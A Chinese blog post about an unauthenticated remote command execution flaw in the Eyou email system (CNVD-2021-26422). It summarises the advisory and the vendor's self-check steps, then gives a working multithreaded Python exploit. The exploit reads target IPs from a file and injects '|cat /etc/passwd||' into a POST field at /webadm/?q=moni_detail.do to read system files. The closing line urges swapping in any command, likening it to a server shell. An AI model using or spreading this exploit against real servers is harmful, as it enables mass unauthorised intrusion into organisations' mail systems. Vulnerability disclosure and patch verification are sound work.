命令执行漏洞-亿邮邮箱系统

MssnHarvey

发布于 2022-08-10 19:16:05

2.6K00

代码可运行

文章被收录于专栏：HarveyHarvey

运行总次数：0

代码可运行

前言

来源：https://mp.weixin.qq.com/s/KDlSyDn7DWwnnFeDednk8g

安全公告编号:CNTA-2021-0012

2021年4月10日，国家信息安全漏洞共享平台（CNVD）收录了亿邮电子邮件系统远程命令执行漏洞（CNVD-2021-26422）。攻击者利用该漏洞，可在未授权的情况实现远程命令执行，获取目标服务器权限。目前，漏洞利用细节已公开，厂商已于4月9日发布版本补丁完成修复。

一、漏洞情况分析

亿邮电子邮件系统是由北京亿中邮信息技术有限公司（以下简称亿邮公司）开发的一款面向中大型集团企业、政府、高校用户的国产邮件系统。亿邮电子邮件系统采用了自主研发MTA引擎、分布式文件系统存储方式、多对列机制、ECS存储子系统、Cache系统等多项核心技术，提供了丰富的邮件功能。

近日，有安全人员披露了亿邮电子邮件系统高危漏洞。未经身份验证的攻击者利用该漏洞，可通过精心构造恶意请求，使用POST方法在目标服务器执行命令，获取目标服务器权限，控制目标服务器。目前，漏洞细节已公开，厂商已发布版本补丁完成修复。

CNVD对该漏洞的综合评级为“高危”。

二、漏洞影响范围

漏洞影响的产品版本为亿邮电子邮件系统V8.3-V8.13的部分二次开发版本。

亿邮电子邮件系统信创版本及V8.13以后版本不受影响。

三、漏洞处置建议

目前，亿邮公司已通过技术支持渠道向用户提供了补丁程序。

CNVD建议使用亿邮电子邮件系统的用户按照如下方式进行自查，发现存在漏洞后，及时联系亿邮公司进行漏洞修补。

在邮件系统服务器上执行如下命令：

ls/usr/local/eyou/mail/lib/php/monitor (8.10.x及以后版本)

ls/usr/local/eyou/mail/app/lib/php/monitor (8.10.x及以前版本)

如不了解具体版本号，上述两条命令可不分版本都执行一下

如所有的验证命令都返回“No such file or directory”或“没有那个文件或目录”则证明不存在漏洞，反之则漏洞存在。

使用涉及版本的用户可通过400服务电话（400-111-6088）联系亿邮公司售后服务，亿邮公司售后维护人员可提供补丁包安装咨询、远程技术支持以及上门服务。

poc

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from queue import Queue
import threading
threads=[]
url_file=input("enter target file>>>")
f=open("yiyou_IP.txt","r")
def POC_1(target_url, result_q):
    vuln_url = target_url + "/webadm/?q=moni_detail.do&action=gragh"
    headers = {
            "Content-Type": "application/x-www-form-urlencoded"
    }
    data = "type='|cat /etc/passwd||'"
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)
        print("\033[32m[o] 正在请求 {}//webadm/?q=moni_detail.do&action=gragh \033[0m".format(target_url))
        if "root" in response.text and response.status_code == 200:
            print("\033[32m[o] 目标 {}存在漏洞 ,成功执行 cat /etc/passwd \033[0m".format(target_url))
            print(target_url+"\033[32m[o] 响应为:\n{} \033[0m".format(response.text))
    except Exception as e:
        print("\033[31m[x] 请求失败 \033[0m", e)
for targets in f.readlines():
    targets=targets.strip()
    t=threading.Thread(target=POC_1,args=(targets,Queue()))
    t.start()
    threads.append(t)
for i in threads:
    i.join()
f.close()

上述脚本用的命令是cat/etc/passwd，你也可执行whoami等命令（就相当于你拿到了服务器的shell了可随意执行服务器命令